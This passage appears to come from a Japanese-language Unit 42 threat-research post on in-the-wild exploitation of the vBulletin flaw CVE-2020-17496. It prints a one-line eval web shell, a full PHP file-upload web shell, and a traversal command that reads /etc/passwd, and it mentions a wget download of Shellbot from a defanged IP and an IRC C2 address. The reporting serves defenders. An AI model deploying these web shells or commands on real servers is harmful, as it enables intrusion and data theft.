monospace;\">widget_php<\/span>\u3068\u60aa\u610f\u306e\u3042\u308b\u30b3\u30fc\u30c9<span class=\"lang:php decode:true crayon-inline \">phpinfo();exit();<\/span>\u00a0\u306f\u914d\u5217<span style=\"font-family: 'courier new', courier, monospace;\">subWidget<\/span>\u306e\u6700\u521d\u306e\u8981\u7d20\u3068\u3057\u3066\u5b58\u5728\u3057\u3066\u3044\u307e\u3059\u3002\u30d0\u30c3\u30af\u30a8\u30f3\u30c9\u304c\u3053\u306eURL\u3092\u51e6\u7406\u3059\u308b\u3068\u60aa\u610f\u306e\u3042\u308b\u30b3\u30fc\u30c9\u304c\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_108661\" aria-describedby=\"caption-attachment-108661\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-108661 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2020\/09\/word-image-12.png\" alt=\"\u3053\u306e\u4fb5\u5bb3\u3055\u308c\u305f\u30da\u30fc\u30b8\u306f\u3001CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u6982\u5ff5\u5b9f\u8a3c\u306e\u4e00\u90e8\u3067\u3001phpinfo()\u30b3\u30fc\u30c9\u306e\u7d50\u679c\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\uff08\u30ea\u30af\u30a8\u30b9\u30c8\u60c5\u5831\u4ed8\u304d\uff09\u3002\" width=\"900\" height=\"645\" \/><figcaption id=\"caption-attachment-108661\" class=\"wp-caption-text\">\u56f3 8 \u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u518d\u73fe\u691c\u8a3c 1<\/figcaption><\/figure>\n<figure id=\"attachment_108663\" aria-describedby=\"caption-attachment-108663\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-108663 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2020\/09\/word-image-13.png\" alt=\"\u3053\u308c\u3082\u3001CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u6982\u5ff5\u5b9f\u8a3c\u306e\u4e00\u90e8\u3067\u3001\u307e\u305f\u5225\u306e\u7d30\u5de5\u3055\u308c\u305f\u30ea\u30af\u30a8\u30b9\u30c8\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\" width=\"900\" height=\"252\" \/><figcaption id=\"caption-attachment-108663\" class=\"wp-caption-text\">\u56f3 9 \u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u518d\u73fe\u691c\u8a3c 2<\/figcaption><\/figure>\n<figure id=\"attachment_108665\" aria-describedby=\"caption-attachment-108665\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-108665 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2020\/09\/word-image-14.png\" alt=\"\u3053\u308c\u306f\u3001CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u6982\u5ff5\u5b9f\u8a3c\u306e\u4e00\u90e8\u3067\u30013\u756a\u76ee\u306e\u7d30\u5de5\u3055\u308c\u305f\u30ea\u30af\u30a8\u30b9\u30c8\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\" width=\"900\" height=\"236\" \/><figcaption id=\"caption-attachment-108665\" class=\"wp-caption-text\">\u56f3 10. \u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u518d\u73fe\u691c\u8a3c 3<\/figcaption><\/figure>\n<h2><strong>\u5b9f\u969b\u306b\u78ba\u8a8d\u3055\u308c\u3066\u3044\u308bCVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8<\/strong><\/h2>\n<p>\u79c1\u305f\u3061\u306f2020\u5e748\u670810\u65e5\u306bCVE-2020-17496\u3092\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3059\u308b\u6700\u521d\u306e\u30a4\u30f3\u30b7\u30c7\u30f3\u30c8\u3092\u691c\u51fa\u3057\u307e\u3057\u305f\u3002\u305d\u306e\u5f8c\u3082\u7570\u306a\u308bIP\u30a2\u30c9\u30ec\u30b9\u304b\u3089\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u8a66\u307f\u304c\u9032\u884c\u4e2d\u3067\u3042\u308b\u3053\u3068\u304c\u78ba\u8a8d\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u305f\u3060\u3057\u3053\u308c\u3089\u306f\u305d\u308c\u305e\u308c\u5225\u500b\u306e\u653b\u6483\u3067\u3042\u3063\u3066\u7279\u5b9a\u653b\u6483\u8005\u306b\u3088\u308b\u5354\u8abf\u7684\u53d6\u308a\u7d44\u307f\u3067\u306f\u306a\u3044\u70b9\u306b\u3054\u6ce8\u610f\u304f\u3060\u3055\u3044\u3002<\/p>\n<h4><span style=\"font-family: georgia, palatino, serif;\">\u30b9\u30ad\u30e3\u30f3\u6d3b\u52d5<\/span><\/h4>\n<p>\u79c1\u305f\u3061\u304c\u30ad\u30e3\u30d7\u30c1\u30e3\u3057\u305f\u60aa\u610f\u306e\u3042\u308b\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u304b\u3089\u306f\u3001\u30b9\u30ad\u30e3\u30f3\u6d3b\u52d5\u3092\u884c\u3046\u30bd\u30fc\u30b9\u304c\u8907\u6570\u3042\u308b\u3053\u3068\u304c\u308f\u304b\u3063\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u30b9\u30ad\u30e3\u30f3\u306f\u3001\u8106\u5f31\u306a\u30b5\u30a4\u30c8\u3092\u898b\u3064\u3051\u3066\u95a2\u9023\u60c5\u5831\u3092\u53ce\u96c6\u3057\u3088\u3046\u3068\u3057\u3066\u304a\u308a\u3001\u30b5\u30a4\u30d0\u30fc\u653b\u6483\u306e\u521d\u671f\u6bb5\u968e\u306b\u3042\u305f\u308a\u307e\u3059\u3002\u305d\u306e\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u3092\u56f311\u304b\u3089\u56f315\u306b\u793a\u3057\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u30b7\u30b9\u30c6\u30e0\u30b3\u30de\u30f3\u30c9\u306e<span style=\"font-family: 'courier new', courier, monospace;\">echo<\/span>\u3068<span style=\"font-family: 'courier new', courier, monospace;\">id<\/span>\u3092\u5b9f\u884c\u3057\u3088\u3046\u3068\u3057\u307e\u3059\u3002\u3053\u308c\u3089\u30b3\u30de\u30f3\u30c9\u306e\u7d50\u679c\u304b\u3089\u653b\u6483\u8005\u306f\u30bf\u30fc\u30b2\u30c3\u30c8\u304c\u8106\u5f31\u304b\u3069\u3046\u304b\u3092\u77e5\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_108667\" aria-describedby=\"caption-attachment-108667\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-108667 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2020\/09\/word-image-15.png\" alt=\"\u3053\u308c\u306f\u3001CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306b\u95a2\u9023\u3057\u305f\u60aa\u610f\u306e\u3042\u308b\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u306e\u30b5\u30f3\u30d7\u30eb\u3067\u3059\u3002\u79c1\u305f\u3061\u304c\u30ad\u30e3\u30d7\u30c1\u30e3\u3057\u305f\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u304b\u3089\u306f\u3001\u30b9\u30ad\u30e3\u30f3\u3092\u5b9f\u884c\u3057\u3066\u3044\u308b\u30bd\u30fc\u30b9IP\u304c\u8907\u6570\u78ba\u8a8d\u3055\u308c\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306e\u6d3b\u52d5\u3067\u306f\u3001\u8106\u5f31\u306a\u30b5\u30a4\u30c8\u3092\u898b\u3064\u3051\u3001\u305d\u308c\u3089\u30b5\u30a4\u30c8\u306b\u95a2\u3059\u308b\u60c5\u5831\u3092\u53ce\u96c6\u3057\u3088\u3046\u3068\u3057\u3066\u3044\u307e\u3059\u3002 \" width=\"900\" height=\"164\" \/><figcaption id=\"caption-attachment-108667\" class=\"wp-caption-text\">\u56f3 11 \u5b9f\u969b\u306b\u78ba\u8a8d\u3055\u308c\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 1<\/figcaption><\/figure>\n<figure id=\"attachment_108669\" aria-describedby=\"caption-attachment-108669\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-108669 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2020\/09\/word-image-16.png\" alt=\"\u3053\u308c\u306f\u3001CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306b\u95a2\u9023\u3057\u305f\u60aa\u610f\u306e\u3042\u308b\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u306e2\u756a\u76ee\u306e\u30b5\u30f3\u30d7\u30eb\u3067\u3059\u3002\u79c1\u305f\u3061\u304c\u30ad\u30e3\u30d7\u30c1\u30e3\u3057\u305f\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u304b\u3089\u306f\u3001\u30b9\u30ad\u30e3\u30f3\u3092\u5b9f\u884c\u3057\u3066\u3044\u308b\u30bd\u30fc\u30b9IP\u304c\u8907\u6570\u78ba\u8a8d\u3055\u308c\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306e\u6d3b\u52d5\u3067\u306f\u3001\u8106\u5f31\u306a\u30b5\u30a4\u30c8\u3092\u898b\u3064\u3051\u3001\u305d\u308c\u3089\u30b5\u30a4\u30c8\u306b\u95a2\u3059\u308b\u60c5\u5831\u3092\u53ce\u96c6\u3057\u3088\u3046\u3068\u3057\u3066\u3044\u307e\u3059\u3002 \" width=\"900\" height=\"156\" \/><figcaption id=\"caption-attachment-108669\" class=\"wp-caption-text\">\u56f3 12. \u5b9f\u969b\u306b\u78ba\u8a8d\u3055\u308c\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 2<\/figcaption><\/figure>\n<figure id=\"attachment_108671\" aria-describedby=\"caption-attachment-108671\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-108671 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2020\/09\/word-image-17.png\" alt=\"\u3053\u308c\u306f\u3001CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306b\u95a2\u9023\u3057\u305f\u60aa\u610f\u306e\u3042\u308b\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u306e3\u756a\u76ee\u306e\u30b5\u30f3\u30d7\u30eb\u3067\u3059\u3002\u79c1\u305f\u3061\u304c\u30ad\u30e3\u30d7\u30c1\u30e3\u3057\u305f\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u304b\u3089\u306f\u3001\u30b9\u30ad\u30e3\u30f3\u3092\u5b9f\u884c\u3057\u3066\u3044\u308b\u30bd\u30fc\u30b9IP\u304c\u8907\u6570\u78ba\u8a8d\u3055\u308c\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306e\u6d3b\u52d5\u3067\u306f\u3001\u8106\u5f31\u306a\u30b5\u30a4\u30c8\u3092\u898b\u3064\u3051\u3001\u305d\u308c\u3089\u30b5\u30a4\u30c8\u306b\u95a2\u3059\u308b\u60c5\u5831\u3092\u53ce\u96c6\u3057\u3088\u3046\u3068\u3057\u3066\u3044\u307e\u3059\u3002 \" width=\"900\" height=\"192\" \/><figcaption id=\"caption-attachment-108671\" class=\"wp-caption-text\">\u56f3 13 \u5b9f\u969b\u306b\u78ba\u8a8d\u3055\u308c\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 3<\/figcaption><\/figure>\n<figure id=\"attachment_108673\" aria-describedby=\"caption-attachment-108673\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-108673 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2020\/09\/word-image-18.png\" alt=\"\u3053\u308c\u306f\u3001CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306b\u95a2\u9023\u3057\u305f\u60aa\u610f\u306e\u3042\u308b\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u306e4\u756a\u76ee\u306e\u30b5\u30f3\u30d7\u30eb\u3067\u3059\u3002\u79c1\u305f\u3061\u304c\u30ad\u30e3\u30d7\u30c1\u30e3\u3057\u305f\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u304b\u3089\u306f\u3001\u30b9\u30ad\u30e3\u30f3\u3092\u5b9f\u884c\u3057\u3066\u3044\u308b\u30bd\u30fc\u30b9IP\u304c\u8907\u6570\u78ba\u8a8d\u3055\u308c\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306e\u6d3b\u52d5\u3067\u306f\u3001\u8106\u5f31\u306a\u30b5\u30a4\u30c8\u3092\u898b\u3064\u3051\u3001\u305d\u308c\u3089\u30b5\u30a4\u30c8\u306b\u95a2\u3059\u308b\u60c5\u5831\u3092\u53ce\u96c6\u3057\u3088\u3046\u3068\u3057\u3066\u3044\u307e\u3059\u3002 \" width=\"900\" height=\"227\" \/><figcaption id=\"caption-attachment-108673\" class=\"wp-caption-text\">\u56f3 14 \u5b9f\u969b\u306b\u78ba\u8a8d\u3055\u308c\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 4<\/figcaption><\/figure>\n<h4><span style=\"font-family: georgia, palatino, serif;\">\u6a5f\u5fae\u306a\u30d5\u30a1\u30a4\u30eb\u306e\u8aad\u307f\u53d6\u308a<\/span><\/h4>\n<p>\u4e00\u90e8\u306e\u653b\u6483\u8005\u306f\u3001\u3053\u306e\u8106\u5f31\u6027\u3092\u60aa\u7528\u3057\u3066\u30b5\u30fc\u30d0\u30fc\u5074\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u8aad\u307f\u53d6\u308d\u3046\u3068\u3057\u307e\u3059\u3002\u3053\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306b\u306fPHP\u95a2\u6570<span style=\"font-family: 'courier new', courier, monospace;\">shell_exec()<\/span>\u304c\u542b\u307e\u308c\u3066\u3044\u3066\u3001\u3053\u308c\u304c\u4efb\u610f\u306e\u30b7\u30b9\u30c6\u30e0\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\u30b7\u30b9\u30c6\u30e0\u30b3\u30de\u30f3\u30c9 <span class=\"lang:sh decode:true crayon-inline \">cat ..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd<\/span>\u00a0\u306f<span style=\"font-family: 'courier new', courier, monospace;\">\/etc\/passwd<\/span>\u306e\u5185\u5bb9\u3092\u8aad\u307f\u53d6\u308a\u307e\u3059\u3002\u3053\u306e\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u3092\u56f315\u306b\u793a\u3057\u307e\u3059\u3002\u653b\u6483\u304c\u6210\u529f\u3059\u308b\u3068\u3001\u30bf\u30fc\u30b2\u30c3\u30c8\u304b\u3089\u306e\u6a5f\u5bc6\u60c5\u5831\u304c\u6f0f\u3048\u3044\u3059\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_108675\" aria-describedby=\"caption-attachment-108675\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-108675 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2020\/09\/word-image-19.png\" alt=\"\u3053\u306eCVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u95a2\u9023\u306e\u60aa\u610f\u306e\u3042\u308b\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u306e\u30b5\u30f3\u30d7\u30eb\u306f\u3001\u30b7\u30b9\u30c6\u30e0\u30b3\u30de\u30f3\u30c9\u5b9f\u884c\u7528\u306ePHP\u95a2\u6570shell_exec()\u3092\u542b\u3080\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002 \" width=\"900\" height=\"166\" \/><figcaption id=\"caption-attachment-108675\" class=\"wp-caption-text\">\u56f3 15 \u5b9f\u969b\u306b\u78ba\u8a8d\u3055\u308c\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 5<\/figcaption><\/figure>\n<h4><span style=\"font-family: georgia, palatino, serif;\">Web\u30b7\u30a7\u30eb\u306e\u4f5c\u6210<\/span><\/h4>\n<p>\u4e00\u90e8\u306e\u653b\u6483\u8005\u306f\u3053\u306e\u8106\u5f31\u6027\u3092\u60aa\u7528\u3057\u3066Web\u30b7\u30a7\u30eb\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u307e\u3059\u3002<\/p>\n<p>\u56f316\u306f\u3001PHP\u95a2\u6570<span style=\"font-family: 'courier new', courier, monospace;\">file_put_content()<\/span>\u3092\u4f7f\u3044\u3001web\u30db\u30b9\u30c8\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u4e0a\u306e\u30d5\u30a1\u30a4\u30eb\u3001conf.php\u5185\u306b\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304cPHP\u30d9\u30fc\u30b9\u306eWeb\u30b7\u30a7\u30eb<!--?php @eval($_POST[\u201cx\u201d]);?-->\u3092\u4f5c\u6210\u3057\u3088\u3046\u3068\u3057\u3066\u3044\u308b\u69d8\u5b50\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\u653b\u6483\u304c\u6210\u529f\u3059\u308b\u3068\u3001\u653b\u6483\u8005\u306f\u30d1\u30e9\u30e1\u30fc\u30bf<span style=\"font-family: 'courier new', courier, monospace;\">x<\/span>\u3092\u6307\u5b9a\u3057\u305fHTTP POST\u30ea\u30af\u30a8\u30b9\u30c8\u3092\u4ecb\u3057\u3066\u30b3\u30de\u30f3\u30c9\u3092Web\u30b7\u30a7\u30eb\u306b\u9001\u4fe1\u3057\u3001\u30b5\u30fc\u30d0\u30fc\u30b5\u30a4\u30c9\u3067\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_108677\" aria-describedby=\"caption-attachment-108677\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-108677 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2020\/09\/word-image-20.png\" alt=\"\u3053\u308c\u306f\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304cPHP\u30d9\u30fc\u30b9\u306eWeb\u30b7\u30a7\u30eb\u3092Web\u30db\u30b9\u30c8\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u306econf.php\u30d5\u30a1\u30a4\u30eb\u306b\u66f8\u304d\u8fbc\u3082\u3046\u3068\u3057\u3066\u3044\u308b\u69d8\u5b50\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\u653b\u6483\u304c\u6210\u529f\u3059\u308b\u3068\u3001\u653b\u6483\u8005\u306f\u30d1\u30e9\u30e1\u30fc\u30bfx\u3092\u6307\u5b9a\u3057\u305fHTTP POST\u30ea\u30af\u30a8\u30b9\u30c8\u3092\u4ecb\u3057\u3066\u30b3\u30de\u30f3\u30c9\u3092Web\u30b7\u30a7\u30eb\u306b\u9001\u4fe1\u3057\u3001\u30b5\u30fc\u30d0\u30fc\u30b5\u30a4\u30c9\u3067\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 \" width=\"900\" height=\"143\" \/><figcaption id=\"caption-attachment-108677\" class=\"wp-caption-text\">\u56f3 16 \u5b9f\u969b\u306b\u78ba\u8a8d\u3055\u308c\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 6<\/figcaption><\/figure>\n<p><a id=\"post-108644-_v8xvyx1o2kck\"><\/a> \u56f317\u306f\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304c\u88ab\u5bb3\u8005\u306e\u30b5\u30fc\u30d0\u30fc\u306bPHP\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3088\u3046\u3068\u3057\u3066\u3044\u308b\u69d8\u5b50\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002web\u30b7\u30a7\u30eb\u30b3\u30fc\u30c9\u306f\u4ee5\u4e0b\u306e\u3068\u304a\u308a\u3067\u3001\u3053\u306e\u30b3\u30fc\u30c9\u306b\u3088\u308a\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u7528\u30da\u30fc\u30b8\u304c\u63d0\u4f9b\u3055\u308c\u307e\u3059\u3002\u3053\u308c\u3092\u4f7f\u3063\u3066\u653b\u6483\u8005\u306f\u30d5\u30a1\u30a4\u30eb\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3057\u3001\u30b5\u30a4\u30d0\u30fc\u653b\u6483\u306e\u30d5\u30a9\u30ed\u30fc\u30a2\u30c3\u30d7\u51e6\u7406\u3092\u5b9f\u884c\u3067\u304d\u307e\u3059\u3002<\/p>\n<pre class=\"lang:php decode:true \">&lt;?php\r\n\r\nerror_reporting(0);\r\n\r\necho \"Jasmine&lt;br&gt;\";\r\n\r\necho\"&lt;font color=#ff0000&gt;\".php_uname().\"\";\r\n\r\nprint \"\\n\";$disable_functions = @ini_get(\"disable_functions\");\r\n\r\necho \"&lt;br&gt;DisablePHP=\".$disable_functions; print \"\\n\";\r\n\r\necho\"&lt;br&gt;&lt;form method=post enctype=multipart\/form-data&gt;\";\r\n\r\necho\"&lt;input type=file name=f&gt;&lt;input name=k type=submit id=k value=upload&gt;&lt;br&gt;\";\r\n\r\nif($_POST[\"k\"]==upload){\r\n\r\nif(@copy($_FILES[\"f\"][\"tmp_name\"],$_FILES[\"f\"][\"name\"])){\r\n\r\necho\"&lt;b&gt;\".$_FILES[\"f\"][\"name\"];\r\n\r\n}else{\r\n\r\necho\"&lt;b&gt;Gagal upload cok\";\r\n\r\n}\r\n\r\n}\r\n\r\n?&gt;<\/pre>\n<p>&nbsp;<\/p>\n<figure id=\"attachment_108679\" aria-describedby=\"caption-attachment-108679\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-108679 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2020\/09\/word-image-21.png\" alt=\"\u3053\u308c\u306fCVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304c\u88ab\u5bb3\u8005\u306e\u30b5\u30fc\u30d0\u30fc\u306bPHP\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3088\u3046\u3068\u3059\u308b\u69d8\u5b50\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002 \" width=\"900\" height=\"182\" \/><figcaption id=\"caption-attachment-108679\" class=\"wp-caption-text\">\u56f3 17 \u5b9f\u969b\u306b\u78ba\u8a8d\u3055\u308c\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 7<\/figcaption><\/figure>\n<p><a id=\"post-108644-_z67f2tb915md\"><\/a> \u56f318\u306f\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304cbase64\u3067\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305fPHP\u30b3\u30fc\u30c9\u3092Web\u30db\u30b9\u30c8\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u306e\u30d5\u30a1\u30a4\u30eb\u306b\u66f8\u304d\u8fbc\u3082\u3046\u3068\u3057\u3066\u3044\u308b\u69d8\u5b50\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u65b0\u3057\u3044\u30da\u30fc\u30b8\u304c\u4efb\u610f\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u5165\u53e3\u3068\u306a\u308a\u3001\u653b\u6483\u8005\u304c\u30b5\u30a4\u30d0\u30fc\u653b\u6483\u306e\u30d5\u30a9\u30ed\u30fc\u30a2\u30c3\u30d7\u51e6\u7406\u3092\u5b9f\u884c\u3067\u304d\u308b\u3088\u3046\u306b\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_108681\" aria-describedby=\"caption-attachment-108681\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-108681 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2020\/09\/word-image-22.png\" alt=\"\u3053\u308c\u306f\u3001CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304cbase64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305fPHP\u30b3\u30fc\u30c9\u3092Web\u30db\u30b9\u30c8\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u306e\u30d5\u30a1\u30a4\u30eb\u306b\u66f8\u304d\u8fbc\u3082\u3046\u3068\u3057\u3066\u3044\u308b\u69d8\u5b50\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002 \" width=\"900\" height=\"157\" \/><figcaption id=\"caption-attachment-108681\" class=\"wp-caption-text\">\u56f3 18 \u5b9f\u969b\u306b\u78ba\u8a8d\u3055\u308c\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 8<\/figcaption><\/figure>\n<h4><span style=\"font-family: georgia, palatino, serif;\">Shellbot\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9<\/span><\/h4>\n<p>\u4e00\u90e8\u306e\u653b\u6483\u8005\u306f\u3053\u306e\u8106\u5f31\u6027\u3092\u5229\u7528\u3057\u3066PHP\u95a2\u6570<span style=\"font-family: 'courier new', courier, monospace;\">shell_exec()<\/span>\u3067\u30b7\u30b9\u30c6\u30e0\u30b3\u30de\u30f3\u30c9<span style=\"font-family: 'courier new', courier, monospace;\">wget<\/span>\u3092\u5b9f\u884c\u3057\u3001 <span style=\"font-family: 'courier new', courier, monospace;\">http:\/\/178[.]170[.]117[.]50\/bot1<\/span> \u3068\u3044\u3046\u30a2\u30c9\u30ec\u30b9\u304b\u3089Perl\u30d9\u30fc\u30b9\u306e\u30b9\u30af\u30ea\u30d7\u30c8 \u30de\u30eb\u30a6\u30a7\u30a2\uff08Shellbot\uff09\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3066\u5b9f\u884c\u3057\u3066\u3044\u307e\u3059\u3002\u305d\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u56f319\u306b\u793a\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_108683\" aria-describedby=\"caption-attachment-108683\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-108683 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2020\/09\/word-image-23.png\" alt=\"\u3053\u308c\u306f\u3001CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u793a\u3057\u3066\u3044\u307e\u3059\" width=\"900\" height=\"122\" \/><figcaption id=\"caption-attachment-108683\" class=\"wp-caption-text\">\u56f3 19 \u5b9f\u969b\u306b\u78ba\u8a8d\u3055\u308c\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 9<\/figcaption><\/figure>\n<p>\u30b9\u30af\u30ea\u30d7\u30c8\u304c\u5b9f\u884c\u3055\u308c\u308b\u3068\u3001<span style=\"font-family: 'courier new', courier, monospace;\">66[.]7[.]149[.]161:6667<\/span>\u3068\u3044\u3046\u30a2\u30c9\u30ec\u30b9\u3067IRC\u30d9\u30fc\u30b9\u306e\u30b3\u30de\u30f3\u30c9&amp;\u30b3\u30f3\u30c8\u30ed\u30fc\u30eb\uff08C2\uff09\u30b5\u30fc\u30d0\u30fc\u306b\u63a5\u7d9a\u3057\u3001IRC\u30c1\u30e3\u30cd\u30eb#afk\u306b\u53c2\u52a0\u3057\u3066\u3001\u30b5\u30fc\u30d0\u30fc\u304b\u3089\u306ePING\u306b\u5fdc\u7b54\u3057\u7d9a\u3051\u307e\u3059\uff08\u56f320\u306e\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u3092\u53c2\u7167\uff09\u3002\u30c1\u30e3\u30c3\u30c8\u30c1\u30e3\u30cd\u30eb\u304b\u3089\u30b3\u30de\u30f3\u30c9\u3092\u53d7\u4fe1\u3059\u308b\u3068\u3001\u30dd\u30fc\u30c8\u30b9\u30ad\u30e3\u30f3\u306e\u95a2\u9023\u30b3\u30fc\u30c9\u306e\u5b9f\u884c\u3001\u30d5\u30a1\u30a4\u30eb\u306e\u30c0\u30a6\u30f3\u3